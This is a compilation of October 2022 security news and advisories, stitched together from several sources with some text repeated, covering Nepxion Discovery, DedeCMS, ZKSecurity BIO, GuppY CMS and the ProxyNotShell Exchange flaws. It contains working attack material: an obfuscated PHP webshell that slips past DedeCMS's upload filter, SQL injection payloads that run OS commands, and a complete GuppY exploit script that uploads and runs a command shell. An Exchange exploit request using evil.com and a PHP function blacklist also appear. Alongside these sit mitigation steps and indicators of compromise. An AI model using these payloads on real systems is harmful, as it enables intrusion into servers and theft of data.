Maintainer of Chinese project closes public issue apparently without issuing a fix

Charlie Osborne 03 October 2022 at 11:20 UTC

Maintainer of Chinese project closes public issue apparently without issuing a fix

An unpatched remote code execution (RCE) vulnerability in Nepxion Discovery, an open source project that provides functionality for the Spring Cloud framework, has been made public.

Security researchers from GitHub Security Lab (GHSL) disclosed the vulnerability, alongside an additional information disclosure flaw in Nepxion Discovery on September 9.

Nepxion, a China-based vendor, maintains several open source projects related to Spring Cloud.

Despite the Nepxion Discovery GitHub page having over 1,300 forks, the security policy page is disabled and the security advisories tab is empty.

**SpEL injection**

In a blog post, GHSL researcher Jorge Rosillo said the most severe vulnerability, tracked as GHSL-2022-033 (CVE-2022-23463), is a critical issue in the discovery-commons function that renders the software vulnerable to SpEL Injection.

SpEL Injection attacks occur when there is a lack of protection to stop user input from passing directly to a SpEL expression parser. In this case, two endpoints turn user input into expressions, pass them through, and input is then allowed to interact with Java classes – including java.lang.Runtime – leading to RCE.

Read more of the latest open source software security news

Due to the severity, this vulnerability was assigned a CVSS score of 9.8.

The second issue, tracked as GHSL-2022-033 (CVE-2022-23464) and issued a can GitHub score of 4.3 (NIST 7.5), is a server-side request forgery (SSRF) flaw that could result in information leaks.

According to the GHSL, no patch has been made available, and there are no known workarounds for either vulnerability. The issues impact Nepxion Discovery versions 6.16.2 and below.

The cybersecurity researchers privately disclosed their findings to Nepxion on May 22. In June, the team requested a security contact and, with no response forthcoming, a public issue was opened on June 20.

The maintainers closed the public issue on August 9.

By August 21, the standard vulnerability disclosure process deadline had expired, leading to the assignment of CVE-2022-23463 and CVE-2022-23464 and public disclosure.

When approached for comment, GitHub pointed us to the original disclosure.

Nepxion has yet to respond to queries submitted by The Daily Swig, but we will update this article if and when we hear back.

YOU MIGHT ALSO LIKE Rancher stored sensitive values in plaintext, exposed Kubernetes clusters to takeover

Nepxion Discovery software with Spring Cloud functionality fails to patch RCE, info leak bugs

DedeCMS 5.7.98 has a file upload vulnerability in the background.

**DedeCMS v5.7.98 RCE**

Dedecms official website：https://www.dedecms.com/download

**Vulnerability Description**

The dedecms v5.7.98 has a file upload function in the background, which can write malicious code to bypass detection and cause RCE vulnerabilities.

Affected product: DedeCMS V5.7.98 Attack type: Remote Affected component: /dede/file\_manage\_control.php

**Recurrence Process**

Visit /dede to login to the website background.

Upload the file below.

 shell.php

<?php
$a = "Y3JlYXRlX2Z1bmN0aW9u";
$b = base64\_decode($a);
$c = $\_COOKIE\['hello'\] . ';';
$b('', $c)();

Upload success.

Visit shell.php to get the webshell.

**Code Audit**

In /dede/file_manage_control.php, the file we upload will be checked by uploadsafe.inc.php

    if (file\_exists($$\_key)) {
        $fp = fopen($$\_key, 'rb');
        $content = fread($fp, ${$\_key . '\_size'});
        fclose($fp);

        global $cfg\_disable\_funs;
        $cfg\_disable\_funs = isset($cfg\_disable\_funs) ? $cfg\_disable\_funs : 'phpinfo,eval,assert,exec,passthru,shell\_exec,system,proc\_open,popen,curl\_exec,curl\_multi\_exec,parse\_ini\_file,show\_source,file\_put\_contents,fsockopen,fopen,fwrite,preg\_replace';
        $cfg\_disable\_funs = $cfg\_disable\_funs.',\_GET,\_POST,\_REQUEST,include,create\_function,array\_map,call\_user\_func,call\_user\_func\_array,array\_filert';
        foreach (explode(",", $cfg\_disable\_funs) as $value) {
            $value = str\_replace(" ", "", $value);
            if(!empty($value) && preg\_match("#\[^a-z\]+\['\\"\]\*{$value}\['\\"\]\*\[\\s\]\*\[(\[\]#i", " {$content}") == TRUE) {
                $content = dede\_htmlspecialchars($content);
                die("DedeCMS提示：当前上传的文件中存在恶意代码！<pre>{$content}</pre>");
            }
            if(!empty($value) && preg\_match("#(<)\[\\s\]\*(script)\[\\s\\S\]\*(src)\[\\s\]\*(=)\[\\s\]\*\[\\"|'\]#i", " {$content}") == TRUE) {
                preg\_match\_all("#(src)\[\\s\]\*(=)\[\\s\]\*\[\\"|'\]\[\\s\]\*((http|https)(:\\/\\/)\[\\S\]\*)\[\\"|'\]#i", " {$content}", $subject);
                foreach ($subject\[3\] as $url) {
                    if (preg\_match("#^(http|https):\\/\\/#i", $url) && !preg\_match("#^{$cfg\_basehost}#", $url)) {
                        die("DedeCMS提示：非本站资源无法访问！<pre>{$url}</pre>");
                    }
                }
            }
        }
    }

$cfg_disable_funsdefines a blacklist. When characters in the file content match the blacklist, they will be blocked. But this can be bypassed by coding in some way.

create\_function is a PHP function, which create an anonymous (lambda-style) function. This callback function is in the blacklist, but we can assign it to a variable using base64 coding, and execute the function through the variable name.

_GET,_POST,_REQUEST are in the blacklist, so we can use _COOKIE to bypass.

By splicing the two together, we get the final payload.

In addition, the function blacklist of the blacklist can be modified in the background. We can also get shell in this way.

CVE-2022-40886: Vulnerability/DedeCMS-v5.7.98-RCE.md at master · Ephemeral1y/Vulnerability

Microsoft Exchange Server Remote Code Execution Vulnerability.

CVE-2022-41082

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

    #######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

    # Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target     =  $options['u'];$command    =  $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array(            'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',            'Accept-Encoding: gzip, deflate',            'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) {    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>

GuppY CMS 6.00.10 Shell Upload

Plus: CIA failures allegedly got US informants killed, a former NSA worker is charged under the Espionage Act, and more.

There were global ripples in tech policy this week as VPN providers were forced to pull out of India as the country’s new data collection law takes hold, and UN countries prepare to elect a new head of the International Telecommunications Union—a key internet standards body.

After explosions and damage to the Nord Stream gas pipeline that runs between Russia and Germany, the destruction is being investigated as deliberate, and a complicated hunt is on to identify the perpetrator. And still-unidentified hackers are “hyperjacking” victims to grab data using a long-feared technique for hijacking virtualization software.

The notorious Lapsus$ hackers have been back on their hacking joyride, compromising massive companies around the world and delivering a dire but important warning about how vulnerable large institutions really are to compromise. And the end-to-end-encrypted communication protocol Matrix patched serious and concerning vulnerabilities this week.

Pornhub debuted a trial of an automated tool that pushes users searching for child sexual abuse material to seek help for their behavior. And Cloudflare rolled out a free Captcha alternative in an attempt to validate humanness online without the headache of finding bicycles in a grid or deciphering blurry text.

We’ve got advice on how to stand up to Big Tech and advocate for data privacy and users' rights in your community, plus tips on the latest iOS, Chrome, and HP updates you need to install.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

On Thursday night, Microsoft confirmed that two unpatched Exchange Server vulnerabilities are actively being exploited by cybercriminals. The vulnerabilities were discovered by a Vietnamese cybersecurity company named GTSC, which claims in a post on its website that the two zero-days have been used in attacks against its customers since early August. While the flaws only impact on-premise Exchange Servers that an attacker has authenticated access to, according to GTSC, the zero-days can be chained together to create backdoors into the vulnerable server. “The vulnerability turns out to be so critical that it allows the attacker to do RCE \[remote code execution\] on the compromised system,” the researchers said.

In a blog post, Microsoft described the first flaw as a server-side request forgery (SSRF) vulnerability, and the second as “an attack that allows remote code execution on a vulnerable server when PowerShell is accessible to the attacker.” The post also provides guidance for how on-premises Microsoft Exchange customers should mitigate the attack.

Sloppy dev-ops and CIA negligence partially enabled Iranian intelligence to identify and capture informants who risked their lives to provide the United States with information, according Reuters. The year-long investigation follows the story of six Iranian men who were jailed as part of an aggressive counterintelligence operation by Iran that began in 2009. The men were partially outed by what Reuters describes as a flawed web-based covert communications system that led to the arrest and execution of dozens of CIA informants in Iran and China. In 2018, Yahoo News reported on the system.

Because the CIA appeared to have purchased web-hosting space in bulk from the same provider, Reuters was able to enumerate hundreds of secret CIA websites meant to facilitate communications between informants around the world and their CIA handlers. The sites, which are no longer active, were devoted to topics such as beauty, fitness, and entertainment. Among them, according to Reuters, was a _Star Wars_ fan page. Two former CIA officials told the news agency that each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured.

James Olson, a former chief of CIA counterintelligence, told Reuters, “If we’re careless, if we’re reckless, and we’ve been penetrated, then shame on us.”

On Wednesday, a former National Security Agency staffer was charged with three violations of the Espionage Act for allegedly attempting to sell classified national defense information to an unnamed foreign government, according to court documents unsealed this week. In a press release about the arrest, the US Department of Justice stated that Jareh Sebastian Dalke, of Colorado Springs, Colorado, used an encrypted email to send excerpts of three classified documents to an undercover FBI agent, who he believed to be working with a foreign government. Dalke allegedly told the agent that he was in serious financial debt and, in exchange for the information, needed compensation in cryptocurrency.

The FBI arrested Dalke on Wednesday when he arrived at Union Station in downtown Denver to deliver classified documents to the undercover agent. If convicted, he could face up to life in prison or the death penalty.

On Tuesday, hackers hijacked _Fast Company_’s content management system, blasting two obscene push notifications to the publication’s Apple News followers. In response, the publication’s parent company, Mansueto Ventures, shut down Fastcompany.com and Inc.com, which it also owns. _Fast Company_ issued a statement calling the messages “vile” and “not in line with the content and ethos” of the outlet. An article the hacker apparently posted to _Fast Company_’s website claimed they got access through a password that was shared across many accounts, including an administrator.

As of yesterday, the company’s websites were still offline, instead redirecting to a statement about the hack.

Microsoft Exchange Server Has a Zero-Day Problem

Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at less than 10 organizations globally.
"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory

Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at less than 10 organizations globally.

"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration," the Microsoft Threat Intelligence Center (MSTIC) said in a Friday report.

The weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the "highly privileged access Exchange systems confer onto an attacker."

The tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative disclosed the flaws to Microsoft Security Response Center (MSRC) earlier this month on September 8-9, 2022.

The two vulnerabilities have been collectively dubbed **ProxyNotShell**, owing to the fact that "it is the same path and SSRF/RCE pair" as ProxyShell but with authentication, suggesting an incomplete patch.

The issues, which are strung together to achieve remote code execution, are listed below -

*   **CVE-2022-41040** - Microsoft Exchange Server Server-Side Request Forgery Vulnerability
*   **CVE-2022-41082** - Microsoft Exchange Server Remote Code Execution Vulnerability

"While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user," Microsoft said. "Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy."

The vulnerabilities were first discovered by Vietnamese cybersecurity company GTSC as part of its incident response efforts for a customer in August 2022. A Chinese threat actor is suspected to be behind the intrusions.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the two Microsoft Exchange Server zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by October 21, 2022.

Microsoft said that it's working on an "accelerated timeline" to release a fix for the shortcomings. It has also published a script for the following URL Rewrite mitigation steps that it said is "successful in breaking current attack chains" -

*   Open IIS Manager
*   Select Default Web Site
*   In the Feature View, click URL Rewrite
*   In the Actions pane on the right-hand side, click Add Rule(s)…
*   Select Request Blocking and click OK
*   Add the string ".\*autodiscover\\.json.\*\\@.\*Powershell.\*" (excluding quotes)
*   Select Regular Expression under Using
*   Select Abort Request under How to block and then click OK
*   Expand the rule and select the rule with the pattern .\*autodiscover\\.json.\*\\@.\*Powershell.\* and click Edit under Conditions.
*   Change the Condition input from {URL} to {REQUEST\_URI}

As additional prevention measures, the company is urging companies to enforce multi-factor authentication (MFA), disable legacy authentication, and educate users about not accepting unexpected two-factor authentication (2FA) prompts.

"Microsoft Exchange is a juicy target for threat actors to exploit for two primary reasons," Travis Smith, vice president of malware threat research at Qualys, told The Hacker News.

"First, Exchange \[...\] being directly connected to the internet creates an attack surface which is accessible from anywhere in the world, drastically increasing its risk of being attacked. Secondly, Exchange is a mission critical function -- organizations can't just unplug or turn off email without severely impacting their business in a negative way."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations

While organizations wait for an official patch for the two zero-day flaws in Microsoft Exchange, they should scan their networks for signs of exploitation and apply these mitigations.

Microsoft has confirmed two new zero-day vulnerabilities in Microsoft Exchange Server (CVE-2022-41040 and CVE-2022-41082) are being exploited in "limited, targeted attacks." In the absence of an official patch, organizations should check their environments for signs of exploitation and then apply the emergency mitigation steps.

*   CVE-2022-41040 — Server-side request forgery, allowing authenticated attackers to make requests posing as the affected machine
*   CVE-2022-41082 — Remote Code Execution, allowing authenticated attackers to execute arbitrary PowerShell.

"Currently, there are no known proof-of-concept scripts or exploitation tooling available in the wild," wrote John Hammond, a threat hunter with Huntress. However, that just means the clock is ticking. With renewed focus on the vulnerability it is just a matter of time before new exploits or proof-of-concept scripts become available.

**Steps to Detect Exploitation**

The first vulnerability — the server-side request forgery flaw — can be used to achieve the second — the remote code execution vulnerability — but the attack vector requires the adversary to already be authentication on the server.

Per GTSC, organizations can check if their Exchange Servers have already been exploited by running the following PowerShell command:

Get-ChildItem -Recurse -Path <Path\_IIS\_Logs> -Filter "\*.log" | Select-String -Pattern 'powershell.\*Autodiscover\\.json.\*\\@.\*200

GTSC has also developed a tool to search for signs of exploitation and released it on GitHub. _This list will be updated as other companies release their tools._

**Microsoft-Specific Tools**

*   According to Microsoft, there are queries in Microsoft Sentinel that could be used to hunt for this specific threat. One such query is the Exchange SSRF Autodiscover ProxyShell detection, which was created in response to ProxyShell. The new Exchange Server Suspicious File Downloads query specifically looks for suspicious downloads in IIS logs.
*   Alerts from Microsoft Defender for Endpoint regarding possible web shell installation, possible IIS web shell, suspicious Exchange Process Execution, possible exploitation of Exchange Server vulnerabilities, suspicious processes indicative of a web shell, and possible IIS compromise can also be signs the Exchange Server has been compromised via the two vulnerabilities.
*   Microsoft Defender will detect the post-exploitation attempts as _Backdoor:ASP/Webshell.Y_ and _Backdoor:Win32/RewriteHttp.A_.

Several security vendors have announced updates to their products to detect exploitation, as well.

Huntress said it monitors approximately 4,500 Exchange servers and is currently investigating those servers for potential signs of exploitation in these servers. "At the moment, Huntress has not seen any signs of exploitation or indicators of compromise on our partners' devices," Hammond wrote.

**Mitigation Steps to Take**

Microsoft promised that it is fast-tracking a fix. Until then, organizations should apply the following mitigations to Exchange Server to protect their networks.

Per Microsoft, on-premises Microsoft Exchange customers should apply new rules through the URL Rewrite Rule module on IIS server.

*   In IIS Manager -> Default Web Site -> Autodiscover -> URL Rewrite -> Actions, select Request Blocking and add the following string to the URL Path:

.\*autodiscover\\.json.\*\\@.\*Powershell.\*

The condition input should be set to {REQUEST\_URI}

*   Block ports 5985 (HTTP) and 5986 (HTTPS) as they are used for Remote PowerShell.

_**If you are using Exchange Online:**_

Microsoft said Exchange Online customers are not affected and do not need to take any action. However, organizations using Exchange Online are likely to have hybrid Exchange environments, with a mix of on-prem and cloud systems. They should follow the above guidance to protect the on-prem servers.

Worried About the Exchange Zero-Day? Here's What to Do

Cisco Talos has released new coverage to detect and prevent the exploitation of two recently disclosed vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. 
While no fixes or patches are available yet, Microsoft has provided mitigations for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year.

Vulnerability details and ongoing exploitation
Exploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts:
autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com
Successful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. Open-source reporting indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, SharPyShell an ASP.NET-based webshell and China Chopper have been deployed on compromised systems consisting of the following artifacts:

C:\inetpub\wwwroot\aspnet_client\Xml.ashx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

This activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet.
Initial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.

Coverage

Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Cisco Talos is releasing SID 60642 to protect against CVE-2022-41040. 
In addition we are releasing SIDs 60637-60641 to protect against malicious activity observed during exploitation of CVE-2022-41082. 
The existing SIDs 27966-27968, 28323, 37245, and 42834-42838 provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:

Asp.Backdoor.AntSword-9972727-1
Asp.Backdoor.Awen-9972728-0
Asp.Backdoor.AntSword-9972729-0


IOCs
IPs and URLs
125[.]212[.]220[.]48
5[.]180[.]61[.]17
47[.]242[.]39[.]92
61[.]244[.]94[.]85
86[.]48[.]6[.]69
86[.]48[.]12[.]64
94[.]140[.]8[.]48
94[.]140[.]8[.]113
103[.]9[.]76[.]208
103[.]9[.]76[.]211
104[.]244[.]79[.]6
112[.]118[.]48[.]186
122[.]155[.]174[.]188
125[.]212[.]241[.]134
185[.]220[.]101[.]182
194[.]150[.]167[.]88
212[.]119[.]34[.]11
137[.]184[.]67[.]33
206[.]188[.]196[.]77
hxxp://206[.]188[.]196[.]77:8080/themes.aspx

****

Cisco Talos has released new coverage to detect and prevent the exploitation of two recently disclosed vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.

While no fixes or patches are available yet, Microsoft has provided mitigations for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year.

**Vulnerability details and ongoing exploitation**

Exploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts:

autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com

Successful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. Open-source reporting indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, SharPyShell an ASP.NET-based webshell and China Chopper have been deployed on compromised systems consisting of the following artifacts:

*   C:\\inetpub\\wwwroot\\aspnet\_client\\Xml.ashx
*   C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx
*   C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx
*   C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx

This activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet.

Initial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing SID **60642** to protect against CVE-2022-41040.

In addition we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082.

The existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

*   Asp.Backdoor.AntSword-9972727-1
*   Asp.Backdoor.Awen-9972728-0
*   Asp.Backdoor.AntSword-9972729-0

**IOCs****IPs and URLs**

125\[.\]212\[.\]220\[.\]48  
5\[.\]180\[.\]61\[.\]17  
47\[.\]242\[.\]39\[.\]92  
61\[.\]244\[.\]94\[.\]85  
86\[.\]48\[.\]6\[.\]69  
86\[.\]48\[.\]12\[.\]64  
94\[.\]140\[.\]8\[.\]48  
94\[.\]140\[.\]8\[.\]113  
103\[.\]9\[.\]76\[.\]208  
103\[.\]9\[.\]76\[.\]211  
104\[.\]244\[.\]79\[.\]6  
112\[.\]118\[.\]48\[.\]186  
122\[.\]155\[.\]174\[.\]188  
125\[.\]212\[.\]241\[.\]134  
185\[.\]220\[.\]101\[.\]182  
194\[.\]150\[.\]167\[.\]88  
212\[.\]119\[.\]34\[.\]11  
137\[.\]184\[.\]67\[.\]33  
206\[.\]188\[.\]196\[.\]77  
hxxp://206\[.\]188\[.\]196\[.\]77:8080/themes.aspx

Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server

